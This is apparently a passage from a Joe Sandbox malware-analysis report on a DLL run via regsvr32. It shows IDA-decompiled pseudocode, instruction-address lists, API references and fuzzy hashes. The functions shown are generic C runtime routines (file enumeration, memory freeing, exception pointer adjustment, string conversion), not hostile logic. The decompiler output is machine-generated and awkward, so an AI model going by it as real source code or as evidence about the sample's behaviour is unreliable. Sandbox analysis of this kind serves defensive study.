																		_t226 = _t188;
																	} else {
																		goto L68;
																	}
																} else {
																	_t255 =  *((intOrPtr*)(_t188 + 1));
																	__eflags = _t255;
																	if(_t255 == 0) {
																		goto L68;
																	} else {
																		__eflags = _t255 - 0x2e;
																		if(_t255 != 0x2e) {
																			goto L67;
																		} else {
																			__eflags =  *((intOrPtr*)(_t188 + 2)) - _t226;
																			if( *((intOrPtr*)(_t188 + 2)) == _t226) {
																				goto L68;
																			} else {
																				goto L67;
																			}
																		}
																	}
																}
																L76:
																FindClose(_t301);
																goto L77;
																L68:
																__eflags = _v620 - _t226;
																if(_v620 != _t226) {
																	E6F6CDC0E(_v632);
																}
																__eflags = FindNextFileW(_t301,  &_v608);
															} while (__eflags != 0);
															_t196 = _v616;
															_t257 = _v648;
															_t278 =  *_t196;
															_t199 =  *((intOrPtr*)(_t196 + 4)) -  *_t196 >> 2;
															__eflags = _t257 - _t199;
															if(_t257 != _t199) {
																E6F6D1BC0(_t278, _t278 + _t257 * 4, _t199 - _t257, 4, E6F6CE9E5);
															}
															goto L76;
														} else {
															_push(_v616);
															_push(_t226);
															_push(_t226);
															_push(_t287);
															L33();
															_t226 = _t179;
														}
														L77:
														__eflags = _v656;
														_pop(_t300);
														if(_v656 != 0) {
															E6F6CDC0E(_v668);
														}
														_t190 = _t226;
													} else {
														_t190 = _t287 + 1;
														__eflags = _t244 - _t287 + 1;
														if(_t244 == _t287 + 1) {
															_t168 = _v609;
															goto L56;
														} else {
															_push(_t278);
															_push(0);
															_push(0);
															_push(_t287);
															L33();
														}
													}
													_pop(_t288);
													__eflags = _v16 ^ _t307;
													_pop(_t227);
													return E6F6C9ADF(_t190, _t227, _v16 ^ _t307, _t278, _t288, _t300);
												} else {
													goto L40;
												}
											}
										} else {
											_t209 = 0xc;
											L37:
											return _t209;
										}
									} else {
										goto L23;
									}
									goto L81;
									L23:
									_t212 = _v12;
									_t263 = _v16;
									 *((intOrPtr*)(_v32 + _t212)) = _t263;
									_t140 = _t212 + 4;
									_t233 = _t263 + _v20;
									_v16 = _t233;
									_v12 = _t140;
									__eflags = _t140 - _v40;
								} while (_t140 != _v40);
								goto L24;
							}
						} else {
							_t297 = _t296 | 0xffffffff;
							_v12 = _t297;
							L25:
							E6F6CDC0E(_t222);
							_pop(_t234);
							goto L26;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t222;
							_t217 = E6F6D2170(_t132,  &_v8);
							_t234 =  *_t292;
							__eflags = _t217;
							if(_t217 != 0) {
								_push( &(_v608.cAlternateFileName));
								_push(_t217);
								_push(_t234);
								L46();
								_t309 = _t309 + 0xc;
								_v12 = _t217;
								_t297 = _t217;
							} else {
								_t218 =  &(_v608.cAlternateFileName);
								_push(_t218);
								_push(_t222);
								_push(_t222);
								_push(_t234);
								L33();
								_t297 = _t218;
								_t309 = _t309 + 0x10;
								_v12 = _t297;
							}
							__eflags = _t297;
							if(_t297 != 0) {
								break;
							}
							_t292 =  &(_a4[1]);
							_a4 = _t292;
							_t132 =  *_t292;
							__eflags = _t132;
							if(_t132 != 0) {
								continue;
							} else {
								_t283 = _v608.cAlternateFileName;
								_t232 = _v40;
								goto L9;
							}
							goto L81;
						}
						_t283 = _v608.cAlternateFileName;
						L26:
						_t272 = _t283;
						_v32 = _t272;
						__eflags = _v40 - _t272;
						asm("sbb ecx, ecx");
						_t236 =  !_t234 & _v40 - _t272 + 0x00000003 >> 0x00000002;
						__eflags = _t236;
						_v28 = _t236;
						if(_t236 != 0) {
							_t299 = _t236;
							do {
								E6F6CDC0E( *_t283);
								_t222 = _t222 + 1;
								_t283 = _t283 + 4;
								__eflags = _t222 - _t299;
							} while (_t222 != _t299);
							_t283 = _v608.cAlternateFileName;
							_t297 = _v12;
						}
						E6F6CDC0E(_t283);
						goto L31;
					}
				} else {
					_t219 = E6F6CD46D(_t317);
					_t297 = 0x16;
					 *_t219 = _t297;
					E6F6CC24F();
					L31:
					return _t297;
				}
				L81:
			}

0x6f6ceba0
0x6f6ceba3
0x6f6ceba6
0x6f6ceba7
0x6f6ceba9
0x6f6cebbf
0x6f6cebc3
0x6f6cebc6
0x6f6cebc8
0x6f6cebca
0x6f6cebcc
0x6f6cebce
0x6f6cebd1
0x6f6cebd4
0x6f6cebd7
0x6f6cebd9
0x6f6cec3c
0x6f6cec3e
0x6f6cec41
0x6f6cec43
0x6f6cec47
0x6f6cec50
0x6f6cec51
0x6f6cec54
0x6f6cec56
0x6f6cec59
0x6f6cec5d
0x6f6cec5d
0x6f6cec5f
0x6f6cec61
0x6f6cec63
0x6f6cec65
0x6f6cec65
0x6f6cec67
0x6f6cec6a
0x6f6cec6d
0x6f6cec6d
0x6f6cec6f
0x6f6cec70
0x6f6cec70
0x6f6cec7b
0x6f6cec7d
0x6f6cec80
0x6f6cec81
0x6f6cec84
0x6f6cec84
0x6f6cec88
0x6f6cec8b
0x6f6cec8e
0x6f6cec8e
0x6f6cec8e
0x6f6cec9b
0x6f6cec9d
0x6f6ceca0
0x6f6ceca2
0x6f6cecba
0x6f6cecbd
0x6f6cecc0
0x6f6cecc2
0x6f6cecc5
0x6f6cecc7
0x6f6cecca
0x6f6ceccd
0x6f6ced2a
0x6f6ced2d
0x6f6ced30
0x6f6ced32
0x00000000
0x6f6ceccf
0x6f6cecd1
0x6f6cecd1
0x6f6cecd3
0x6f6cecd6
0x6f6cecd6
0x6f6cecd8
0x6f6cecda
0x6f6cece0
0x6f6cece3
0x6f6cece3
0x6f6cece5
0x6f6cece6
0x6f6cece6
0x6f6ceced
0x6f6cecf0
0x6f6cecf4
0x6f6ced01
0x6f6ced06
0x6f6ced09
0x6f6ced0b
0x6f6ced7f
0x6f6ced80
0x6f6ced81
0x6f6ced82
0x6f6ced83
0x6f6ced84
0x6f6ced89
0x6f6ced8d
0x6f6ced8f
0x6f6ced90
0x6f6ced93
0x6f6ced93
0x6f6ced96
0x6f6ced96
0x6f6ced98
0x6f6ced99
0x6f6ced99
0x6f6ced9d
0x6f6ced9e
0x6f6ceda5
0x6f6ceda8
0x6f6cedab
0x6f6cedad
0x6f6cedb5
0x6f6cedb6
0x6f6cedb7
0x6f6cedba
0x6f6cedc4
0x6f6cedc8
0x6f6cedca
0x6f6cedde
0x6f6cedde
0x6f6cede1
0x6f6cedeb
0x6f6cedf0
0x6f6cedf3
0x6f6cedf5
0x00000000
0x6f6cedf7
0x6f6cedf7
0x6f6cedfc
0x6f6cee03
0x6f6cee06
0x6f6cee08
0x6f6cee19
0x6f6cee1b
0x6f6cee1d
0x6f6cee1d
0x6f6cee1d
0x6f6cee0a
0x6f6cee0b
0x6f6cee10
0x6f6cee13
0x6f6cee22
0x6f6cee28
0x00000000
0x6f6cee2b
0x6f6cedcc
0x6f6cedcc
0x6f6cedd2
0x6f6cedd7
0x6f6cedda
0x6f6ceddc
0x6f6cee2e
0x6f6cee30
0x6f6cee31
0x6f6cee32
0x6f6cee33
0x6f6cee34
0x6f6cee35
0x6f6cee3a
0x6f6cee3d
0x6f6cee3e
0x6f6cee40
0x6f6cee46
0x6f6cee4d
0x6f6cee50
0x6f6cee53
0x6f6cee56
0x6f6cee57
0x6f6cee58
0x6f6cee5b
0x6f6cee61
0x6f6cee63
0x6f6cee65
0x6f6cee65
0x6f6cee67
0x6f6cee69
0x00000000
0x00000000
0x6f6cee6b
0x6f6cee6d
0x6f6cee6f
0x6f6cee71
0x6f6cee7c
0x6f6cee7e
0x6f6cee80
0x00000000
0x00000000
0x6f6cee80
0x6f6cee71
0x00000000
0x6f6cee6d
0x6f6cee82
0x6f6cee82
0x6f6cee88
0x6f6cee8a
0x6f6cee90
0x6f6cee92
0x6f6ceeb4
0x6f6ceeb4
0x6f6ceeb6
0x6f6ceeb8
0x6f6ceec4
0x6f6ceec4
0x6f6ceeba
0x6f6ceeba
0x6f6ceebc
0x00000000
0x6f6ceebe
0x6f6ceebe
0x6f6ceec0
0x6f6ceec2
0x00000000
0x00000000
0x6f6ceec2
0x6f6ceebc
0x6f6ceecc
0x6f6ceed4
0x6f6ceeda
0x6f6ceedb
0x6f6ceedd
0x6f6ceee5
0x6f6ceeeb
0x6f6ceef1
0x6f6ceef7
0x6f6cef0b
0x6f6cef10
0x6f6cef1b
0x6f6cef2b
0x6f6cef31
0x6f6cef33
0x6f6cef36
0x6f6cef59
0x6f6cef59
0x6f6cef5e
0x6f6cef64
0x6f6cef64
0x6f6cef6a
0x6f6cef70
0x6f6cef76
0x6f6cef7c
0x6f6cef82
0x6f6cefa3
0x6f6cefa8
0x6f6cefad
0x6f6cefb1
0x6f6cefb7
0x6f6cefba
0x6f6cefcd
0x6f6cefcd
0x6f6cefd3
0x6f6cefd9
0x6f6cefda
0x6f6cefdb
0x6f6cefe0
0x6f6cefe3
0x6f6cefe9
0x6f6cefeb
0x6f6cf049
0x6f6cf04f
0x6f6cf057
0x6f6cf05c
0x6f6cf062
0x6f6cf063
0x00000000
0x00000000
0x00000000
0x6f6cefbc
0x6f6cefbc
0x6f6cefbf
0x6f6cefc1
0x00000000
0x6f6cefc3
0x6f6cefc3
0x6f6cefc6
0x00000000
0x6f6cefc8
0x6f6cefc8
0x6f6cefcb
0x00000000
0x00000000
0x00000000
0x00000000
0x6f6cefcb
0x6f6cefc6
0x6f6cefc1
0x6f6cf065
0x6f6cf066
0x00000000
0x6f6cefed
0x6f6cefed
0x6f6ceff3
0x6f6ceffb
0x6f6cf000
0x6f6cf00f
0x6f6cf00f
0x6f6cf017
0x6f6cf01d
0x6f6cf023
0x6f6cf02a
0x6f6cf02d
0x6f6cf02f
0x6f6cf03f
0x6f6cf044
0x00000000
0x6f6cef38
0x6f6cef38
0x6f6cef3e
0x6f6cef3f
0x6f6cef40
0x6f6cef41
0x6f6cef49
0x6f6cef49
0x6f6cf06c
0x6f6cf06c
0x6f6cf073
0x6f6cf074
0x6f6cf07c
0x6f6cf081
0x6f6cf082
0x6f6cee94
0x6f6cee94
0x6f6cee97
0x6f6cee99
0x6f6ceeae
0x00000000
0x6f6cee9b
0x6f6cee9b
0x6f6cee9e
0x6f6cee9f
0x6f6ceea0
0x6f6ceea1
0x6f6ceea6
0x6f6cee99
0x6f6cf087
0x6f6cf088
0x6f6cf08a
0x6f6cf091
0x00000000
0x00000000
0x00000000
0x6f6ceddc
0x6f6cedaf
0x6f6cedb1
0x6f6cedb2
0x6f6cedb4
0x6f6cedb4
0x00000000
0x00000000
0x00000000
0x00000000
0x6f6ced0d
0x6f6ced0d
0x6f6ced13
0x6f6ced16
0x6f6ced19
0x6f6ced1c
0x6f6ced1f
0x6f6ced22
0x6f6ced25
0x6f6ced25
0x00000000
0x6f6cecd6
0x6f6ceca4
0x6f6ceca4
0x6f6ceca7
0x6f6ced34
0x6f6ced35
0x6f6ced3a
0x00000000
0x6f6ced3a
0x6f6cebdb
0x6f6cebdb
0x6f6cebde
0x6f6cebe6
0x6f6cebe9
0x6f6cebf0
0x6f6cebf2
0x6f6cebf4
0x6f6cec0f
0x6f6cec10
0x6f6cec11
0x6f6cec12
0x6f6cec17
0x6f6cec1a
0x6f6cec1d
0x6f6cebf6
0x6f6cebf6
0x6f6cebf9
0x6f6cebfa
0x6f6cebfb
0x6f6cebfc
0x6f6cebfd
0x6f6cec02
0x6f6cec04
0x6f6cec07
0x6f6cec07
0x6f6cec1f
0x6f6cec21
0x00000000
0x00000000
0x6f6cec2a
0x6f6cec2d
0x6f6cec30
0x6f6cec32
0x6f6cec34
0x00000000
0x6f6cec36
0x6f6cec36
0x6f6cec39
0x00000000
0x6f6cec39
0x00000000
0x6f6cec34
0x6f6cecaf
0x6f6ced3b
0x6f6ced3e
0x6f6ced42
0x6f6ced4b
0x6f6ced4e
0x6f6ced52
0x6f6ced52
0x6f6ced54
0x6f6ced57
0x6f6ced59
0x6f6ced5b
0x6f6ced5d
0x6f6ced62
0x6f6ced63
0x6f6ced67
0x6f6ced67
0x6f6ced6b
0x6f6ced6e
0x6f6ced6e
0x6f6ced72
0x00000000
0x6f6ced79
0x6f6cebab
0x6f6cebab
0x6f6cebb2
0x6f6cebb3
0x6f6cebb5
0x6f6ced7a
0x6f6ced7e
0x6f6ced7e
0x00000000

APIs

_free.LIBCMT ref: 6F6CED35

Strings

*?, xrefs: 6F6CEBDE

Memory Dump Source

Source File: 00000019.00000002.665782450.000000006F6C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F6C0000, based on PE: true

Associated: 00000019.00000002.665775734.000000006F6C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665829052.000000006F6D5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665868726.000000006F6DC000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665891961.000000006F6DE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_6f6c0000_regsvr32.jbxd

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: 1aa044b2e489118f0afdaa97e03eedc89370b5ab67caed0016f4f3b18f788326
Instruction ID: 38530b91baba280e154b61709e16080758e4af2f74e4cd067aafd98b14df7b81
Opcode Fuzzy Hash: 1aa044b2e489118f0afdaa97e03eedc89370b5ab67caed0016f4f3b18f788326
Instruction Fuzzy Hash: EB619FB5E002199FDB14CFA8C8819EEFBF9EF58310B14826AD955E7340D731AE418B91

Uniqueness

Uniqueness Score: -1.00%

Function 6F6CAE74 Relevance: 6.2, APIs: 4, Instructions: 168
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 67%

			E6F6CAE74(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t52;
				signed int _t53;
				intOrPtr _t54;
				signed int _t58;
				signed int _t61;
				intOrPtr _t71;
				signed int _t75;
				signed int _t79;
				signed int _t81;
				signed int _t84;
				signed int _t85;
				signed int _t97;
				signed int* _t98;
				signed char* _t101;
				signed int _t107;
				void* _t111;

				_push(0x10);
				_push(0x6f6da770);
				E6F6C9960(__ebx, __edi, __esi);
				_t75 = 0;
				_t52 =  *(_t111 + 0x10);
				_t81 = _t52[1];
				if(_t81 == 0 ||  *((intOrPtr*)(_t81 + 8)) == 0) {
					L30:
					_t53 = 0;
					__eflags = 0;
					goto L31;
				} else {
					_t97 = _t52[2];
					if(_t97 != 0 ||  *_t52 < 0) {
						_t84 =  *_t52;
						_t107 =  *(_t111 + 0xc);
						if(_t84 >= 0) {
							_t107 = _t107 + 0xc + _t97;
						}
						 *(_t111 - 4) = _t75;
						_t101 =  *(_t111 + 0x14);
						if(_t84 >= 0 || ( *_t101 & 0x00000010) == 0) {
							L10:
							_t54 =  *((intOrPtr*)(_t111 + 8));
							__eflags = _t84 & 0x00000008;
							if((_t84 & 0x00000008) == 0) {
								__eflags =  *_t101 & 0x00000001;
								if(( *_t101 & 0x00000001) == 0) {
									_t84 =  *(_t54 + 0x18);
									__eflags = _t101[0x18] - _t75;
									if(_t101[0x18] != _t75) {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												__eflags =  *_t101 & 0x00000004;
												_t79 = 0;
												_t75 = (_t79 & 0xffffff00 | ( *_t101 & 0x00000004) != 0x00000000) + 1;
												__eflags = _t75;
												 *(_t111 - 0x20) = _t75;
												goto L29;
											}
										}
									} else {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												E6F6C9DB0(_t107, E6F6CAC5A(_t84,  &(_t101[8])), _t101[0x14]);
												goto L29;
											}
										}
									}
								} else {
									__eflags =  *(_t54 + 0x18);
									if( *(_t54 + 0x18) == 0) {
										goto L32;
									} else {
										__eflags = _t107;
										if(_t107 == 0) {
											goto L32;
										} else {
											E6F6C9DB0(_t107,  *(_t54 + 0x18), _t101[0x14]);
											__eflags = _t101[0x14] - 4;
											if(_t101[0x14] == 4) {
												__eflags =  *_t107;
												if( *_t107 != 0) {
													_push( &(_t101[8]));
													_push( *_t107);
													goto L21;
												}
											}
											goto L29;
										}
									}
								}
							} else {
								_t84 =  *(_t54 + 0x18);
								goto L12;
							}
						} else {
							_t71 =  *0x6f6dd368; // 0x0
							 *((intOrPtr*)(_t111 - 0x1c)) = _t71;
							if(_t71 == 0) {
								goto L10;
							} else {
								 *0x6f6d51b8();
								_t84 =  *((intOrPtr*)(_t111 - 0x1c))();
								L12:
								if(_t84 == 0 || _t107 == 0) {
									L32:
									E6F6CD547(_t75, _t84, _t97, _t101, _t107);
									asm("int3");
									_push(8);
									_push(0x6f6da790);
									E6F6C9960(_t75, _t101, _t107);
									_t98 =  *(_t111 + 0x10);
									_t85 =  *(_t111 + 0xc);
									__eflags =  *_t98;
									if(__eflags >= 0) {
										_t103 = _t85 + 0xc + _t98[2];
										__eflags = _t85 + 0xc + _t98[2];
									} else {
										_t103 = _t85;
									}
									 *(_t111 - 4) =  *(_t111 - 4) & 0x00000000;
									_t108 =  *(_t111 + 0x14);
									_push( *(_t111 + 0x14));
									_push(_t98);
									_push(_t85);
									_t77 =  *((intOrPtr*)(_t111 + 8));
									_push( *((intOrPtr*)(_t111 + 8)));
									_t58 = E6F6CAE74(_t77, _t103, _t108, __eflags) - 1;
									__eflags = _t58;
									if(_t58 == 0) {
										_t61 = E6F6CBB74(_t103, _t108[0x18], E6F6CAC5A( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])));
									} else {
										_t61 = _t58 - 1;
										__eflags = _t61;
										if(_t61 == 0) {
											_t61 = E6F6CBB84(_t103, _t108[0x18], E6F6CAC5A( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])), 1);
										}
									}
									 *(_t111 - 4) = 0xfffffffe;
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t61;
								} else {
									 *_t107 = _t84;
									_push( &(_t101[8]));
									_push(_t84);
									L21:
									 *_t107 = E6F6CAC5A();
									L29:
									 *(_t111 - 4) = 0xfffffffe;
									_t53 = _t75;
									L31:
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t53;
								}
							}
						}
					} else {
						goto L30;
					}
				}
			}

0x6f6cae74
0x6f6cae76
0x6f6cae7b
0x6f6cae80
0x6f6cae82
0x6f6cae85
0x6f6cae8a
0x6f6caf9a
0x6f6caf9a
0x6f6caf9a
0x00000000
0x6f6cae99
0x6f6cae99
0x6f6cae9e
0x6f6caea8
0x6f6caeaa
0x6f6caeaf
0x6f6caeb4
0x6f6caeb4
0x6f6caeb6
0x6f6caeb9
0x6f6caebe
0x6f6caee0
0x6f6caee0
0x6f6caee3
0x6f6caee6
0x6f6caf04
0x6f6caf07
0x6f6caf46
0x6f6caf49
0x6f6caf4c
0x6f6caf71
0x6f6caf73
0x00000000
0x6f6caf75
0x6f6caf75
0x6f6caf77
0x00000000
0x6f6caf79
0x6f6caf79
0x6f6caf7e
0x6f6caf82
0x6f6caf82
0x6f6caf83
0x00000000
0x6f6caf83
0x6f6caf77
0x6f6caf4e
0x6f6caf4e
0x6f6caf50
0x00000000
0x6f6caf52
0x6f6caf52
0x6f6caf54
0x00000000
0x6f6caf56
0x6f6caf67
0x00000000
0x6f6caf6c
0x6f6caf54
0x6f6caf50
0x6f6caf09
0x6f6caf09
0x6f6caf0d
0x00000000
0x6f6caf13
0x6f6caf13
0x6f6caf15
0x00000000
0x6f6caf1b
0x6f6caf22
0x6f6caf2a
0x6f6caf2e
0x6f6caf30
0x6f6caf33
0x6f6caf38
0x6f6caf39
0x00000000
0x6f6caf39
0x6f6caf33
0x00000000
0x6f6caf2e
0x6f6caf15
0x6f6caf0d
0x6f6caee8
0x6f6caee8
0x00000000
0x6f6caee8
0x6f6caec5
0x6f6caec5
0x6f6caeca
0x6f6caecf
0x00000000
0x6f6caed1
0x6f6caed3
0x6f6caedc
0x6f6caeeb
0x6f6caeed
0x6f6cafac
0x6f6cafac
0x6f6cafb1
0x6f6cafb2
0x6f6cafb4
0x6f6cafb9
0x6f6cafbe
0x6f6cafc1
0x6f6cafc4
0x6f6cafc7
0x6f6cafd0
0x6f6cafd0
0x6f6cafc9
0x6f6cafc9
0x6f6cafc9
0x6f6cafd3
0x6f6cafd7
0x6f6cafda
0x6f6cafdb
0x6f6cafdc
0x6f6cafdd
0x6f6cafe0
0x6f6cafe9
0x6f6cafe9
0x6f6cafec
0x6f6cb022
0x6f6cafee
0x6f6cafee
0x6f6cafee
0x6f6caff1
0x6f6cb008
0x6f6cb008
0x6f6caff1
0x6f6cb027
0x6f6cb031
0x6f6cb03d
0x6f6caefb
0x6f6caefb
0x6f6caf00
0x6f6caf01
0x6f6caf3b
0x6f6caf42
0x6f6caf86
0x6f6caf86
0x6f6caf8d
0x6f6caf9c
0x6f6caf9f
0x6f6cafab
0x6f6cafab
0x6f6caeed
0x6f6caecf
0x00000000
0x00000000
0x00000000
0x6f6cae9e

APIs

___AdjustPointer.LIBCMT ref: 6F6CAF3B
___AdjustPointer.LIBCMT ref: 6F6CAF5E
___AdjustPointer.LIBCMT ref: 6F6CAFFA

Memory Dump Source

Source File: 00000019.00000002.665782450.000000006F6C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F6C0000, based on PE: true

Associated: 00000019.00000002.665775734.000000006F6C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665829052.000000006F6D5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665868726.000000006F6DC000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665891961.000000006F6DE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_6f6c0000_regsvr32.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 8fa0e3264c992028e68567dd7a48767c30fbada747bc1001ea4981d70f9ba991
Instruction ID: f8c68c01ecba2d4f0bf57c8deb5e551a039b8e674d94589cac8e97521d36890f
Opcode Fuzzy Hash: 8fa0e3264c992028e68567dd7a48767c30fbada747bc1001ea4981d70f9ba991
Instruction Fuzzy Hash: 335101B2604706EFEB159F61C960BEA77B5FF05714F10412EE9A587290E731EC81CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6F6CEAAF Relevance: 6.1, APIs: 4, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F6CEAAF(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t19;
				intOrPtr _t29;
				char _t31;
				intOrPtr _t38;
				intOrPtr* _t40;
				intOrPtr _t41;

				_t40 = _a4;
				if(_t40 != 0) {
					_t31 = 0;
					__eflags =  *_t40;
					if( *_t40 != 0) {
						_t16 = E6F6CFCA5(_a16, 0, _t40, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t16;
						if(__eflags != 0) {
							_t38 = _a8;
							__eflags = _t16 -  *((intOrPtr*)(_t38 + 0xc));
							if(__eflags <= 0) {
								L11:
								_t17 = E6F6CFCA5(_a16, _t31, _t40, 0xffffffff,  *((intOrPtr*)(_t38 + 8)),  *((intOrPtr*)(_t38 + 0xc)), _t31, _t31);
								__eflags = _t17;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t38 + 0x10)) = _t17 - 1;
									_t19 = 0;
									__eflags = 0;
								} else {
									E6F6CD437(GetLastError());
									_t19 =  *((intOrPtr*)(E6F6CD46D(__eflags)));
								}
								L14:
								return _t19;
							}
							_t19 = E6F6CF0EB(_t38, __eflags, _t16);
							__eflags = _t19;
							if(_t19 != 0) {
								goto L14;
							}
							goto L11;
						}
						E6F6CD437(GetLastError());
						return  *((intOrPtr*)(E6F6CD46D(__eflags)));
					}
					_t41 = _a8;
					__eflags =  *((intOrPtr*)(_t41 + 0xc));
					if(__eflags != 0) {
						L6:
						 *((char*)( *((intOrPtr*)(_t41 + 8)))) = _t31;
						L2:
						 *((intOrPtr*)(_t41 + 0x10)) = _t31;
						return 0;
					}
					_t29 = E6F6CF0EB(_t41, __eflags, 1);
					__eflags = _t29;
					if(_t29 != 0) {
						return _t29;
					}
					goto L6;
				}
				_t41 = _a8;
				E6F6CF0D1(_t41);
				_t31 = 0;
				 *((intOrPtr*)(_t41 + 8)) = 0;
				 *((intOrPtr*)(_t41 + 0xc)) = 0;
				goto L2;
			}

0x6f6ceab6
0x6f6ceabb
0x6f6cead9
0x6f6ceadb
0x6f6ceade
0x6f6ceb0b
0x6f6ceb13
0x6f6ceb15
0x6f6ceb2e
0x6f6ceb31
0x6f6ceb34
0x6f6ceb42
0x6f6ceb51
0x6f6ceb59
0x6f6ceb5b
0x6f6ceb74
0x6f6ceb77
0x6f6ceb77
0x6f6ceb5d
0x6f6ceb64
0x6f6ceb6f
0x6f6ceb6f
0x6f6ceb79
0x00000000
0x6f6ceb79
0x6f6ceb39
0x6f6ceb3e
0x6f6ceb40
0x00000000
0x00000000
0x00000000
0x6f6ceb40
0x6f6ceb1e
0x00000000
0x6f6ceb29
0x6f6ceae0
0x6f6ceae3
0x6f6ceae6
0x6f6ceaf9
0x6f6ceafc
0x6f6ceacf
0x6f6ceacf
0x00000000
0x6f6cead2
0x6f6ceaec
0x6f6ceaf1
0x6f6ceaf3
0x6f6ceb7d
0x6f6ceb7d
0x00000000
0x6f6ceaf3
0x6f6ceabd
0x6f6ceac2
0x6f6ceac7
0x6f6ceac9
0x6f6ceacc
0x00000000

APIs

Part of subcall function 6F6CF0D1: _free.LIBCMT ref: 6F6CF0DF

Part of subcall function 6F6CFCA5: WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,00000001,6F6CE286,6F6D12A9,0000FDE9,00000000,?,?,?,6F6D1022,0000FDE9,00000000,?), ref: 6F6CFD51

GetLastError.KERNEL32 ref: 6F6CEB17
__dosmaperr.LIBCMT ref: 6F6CEB1E
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6F6CEB5D
__dosmaperr.LIBCMT ref: 6F6CEB64

Memory Dump Source

Source File: 00000019.00000002.665782450.000000006F6C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F6C0000, based on PE: true

Associated: 00000019.00000002.665775734.000000006F6C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665829052.000000006F6D5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665868726.000000006F6DC000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665891961.000000006F6DE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_6f6c0000_regsvr32.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: 59f1040d9f60082ae4a23302a8c0491a9365a1795dd847c035cab652cbacd2dc
Instruction ID: 5be4f6c245f73cb2d385f69d9e21ff2dc5b309ba582175c571de4d0de303c992
Opcode Fuzzy Hash: 59f1040d9f60082ae4a23302a8c0491a9365a1795dd847c035cab652cbacd2dc
Instruction Fuzzy Hash: A521B071604705AFE7109FB68D81D6BB7BDEF123687008618E9AAD7690DB31FC4087A2

Uniqueness

Uniqueness Score: -1.00%

Function 6F6CD9BC Relevance: 6.1, APIs: 4, Instructions: 72
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 75%

			E6F6CD9BC(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				long _t3;
				intOrPtr _t5;
				long _t6;
				intOrPtr _t9;
				long _t10;
				signed int _t39;
				signed int _t40;
				void* _t43;
				void* _t49;
				signed int _t51;
				signed int _t53;
				signed int _t54;
				long _t56;
				long _t60;
				long _t61;
				void* _t65;

				_t49 = __edx;
				_t43 = __ecx;
				_t60 = GetLastError();
				_t2 =  *0x6f6dc110; // 0x7
				_t67 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E6F6CDF59(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t51 = E6F6CDC48(1, 0x364);
						_pop(_t43);
						__eflags = _t51;
						if(__eflags != 0) {
							__eflags = E6F6CDF59(__eflags,  *0x6f6dc110, _t51);
							if(__eflags != 0) {
								E6F6CD7BE(_t51, 0x6f6dd850);
								E6F6CDC0E(0);
								_t65 = _t65 + 0xc;
								goto L13;
							} else {
								_t39 = 0;
								E6F6CDF59(__eflags,  *0x6f6dc110, 0);
								_push(_t51);
								goto L9;
							}
						} else {
							_t39 = 0;
							__eflags = 0;
							E6F6CDF59(0,  *0x6f6dc110, 0);
							_push(0);
							L9:
							E6F6CDC0E();
							_pop(_t43);
							goto L4;
						}
					}
				} else {
					_t51 = E6F6CDF1A(_t67, _t2);
					if(_t51 == 0) {
						_t2 =  *0x6f6dc110; // 0x7
						goto L6;
					} else {
						if(_t51 != 0xffffffff) {
							L13:
							_t39 = _t51;
						} else {
							L3:
							_t39 = 0;
							L4:
							_t51 = _t39;
						}
					}
				}
				SetLastError(_t60);
				asm("sbb edi, edi");
				_t53 =  ~_t51 & _t39;
				if(_t53 == 0) {
					E6F6CD547(_t39, _t43, _t49, _t53, _t60);
					asm("int3");
					_t5 =  *0x6f6dc110; // 0x7
					_push(_t60);
					__eflags = _t5 - 0xffffffff;
					if(__eflags == 0) {
						L22:
						_t6 = E6F6CDF59(__eflags, _t5, 0xffffffff);
						__eflags = _t6;
						if(_t6 == 0) {
							goto L31;
						} else {
							_t60 = E6F6CDC48(1, 0x364);
							_pop(_t43);
